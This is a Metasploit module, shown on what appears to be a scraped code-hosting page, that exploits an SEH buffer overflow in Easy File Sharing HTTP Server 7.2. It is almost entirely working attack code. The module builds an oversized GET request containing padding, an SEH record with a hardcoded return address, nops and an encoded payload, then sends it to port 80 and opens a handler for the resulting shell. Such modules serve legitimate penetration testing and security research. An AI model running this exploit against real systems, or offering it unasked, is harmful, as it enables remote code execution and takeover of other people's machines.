Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/http/easyfilesharing_seh.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow',14'Description' => %q{15This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.16},17'Author' => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>',18'License' => MSF_LICENSE,19'References' =>20[21[ 'EDB', '39008' ],22],23'Privileged' => true,24'Payload' =>25{26'Space' => 390,27'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",28'StackAdjustment' => -3500,29},30'Platform' => 'win',31'Targets' =>32[33[ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ],34],35'DefaultOptions' => {36'RPORT' => 8037},38'DisclosureDate' => '2015-12-02',39'DefaultTarget' => 0))40end4142def print_status(msg='')43super("#{peer} - #{msg}")44end4546def exploit47connect48print_status("Sending exploit...")49sploit = "GET "50sploit << rand_text_alpha_upper(4061)51sploit << generate_seh_record(target.ret)52sploit << make_nops(19)53sploit << payload.encoded54sploit << make_nops(7)55sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20)56sploit << " HTTP/1.0\r\n\r\n"57sock.put(sploit)58print_good("Exploit Sent")59handler60disconnect61end62end636465